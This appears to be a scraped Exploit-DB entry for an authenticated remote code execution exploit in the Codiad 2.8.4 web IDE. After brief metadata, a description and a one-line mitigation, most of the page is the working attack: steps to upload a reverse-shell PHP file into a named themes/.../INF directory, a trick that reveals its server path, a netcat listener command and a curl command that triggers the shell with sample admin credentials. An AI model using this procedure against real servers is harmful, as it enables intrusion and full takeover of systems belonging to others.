header-logo
Suggest Exploit
vendor:
Codiad
by:
P4p4_M4n3
9.8
CVSS
CRITICAL
Remote Code Execution
78
CWE
Product Name: Codiad
Affected Version From: 2.8.2004
Affected Version To: 2.8.2004
Patch Exists: YES
Related CWE:
CPE: a:codiad:codiad
Metasploit:
Other Scripts:
Platforms Tested: WebApp
2020

Codiad 2.8.4 – Remote Code Execution (Authenticated) (4)

A vulnerability in Codiad 2.8.4 allows an authenticated user to execute arbitrary code on the server. An attacker can upload a malicious file to the INF directory and delete it to get the full path of the file. The attacker can then use curl to execute the malicious file and gain a reverse shell.

Mitigation:

Upgrade to the latest version of Codiad, or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (4)
# Author: P4p4_M4n3
# Vendor Homepage: http://codiad.com/
# Software Links : https://github.com/Codiad/Codiad/releases
# Type:  WebApp

###################-------------------------##########################------------###################  
#    Proof of Concept:                                                                              #   
#                                                                                                   #
#   1- login on codiad                                                                              #
#                                                                                                   #     
#   2- go to themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/" directory #
#                                                                                                   #
#   3-  right click and select upload file                                                          #  
#                                                                                                   #
#   4- click on "Drag file or Click Here To Upload" and select your reverse_shell file              #
#                                                                                                   #  
###################-------------------------#########################-------------###################

   after that your file should be in INF directory, right click on your file and select delete,
 
   and you will see the full path of your file
   
   run it in your terminal with "curl" and boom!!

/var/www/html/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php

1 -  # nc -lnvp 1234
2 - curl http://target_ip/codiad/themes/default/filemanager/images/codiad/manifest/files/codiad/example/INF/shell.php -u "admin:P@ssw0rd"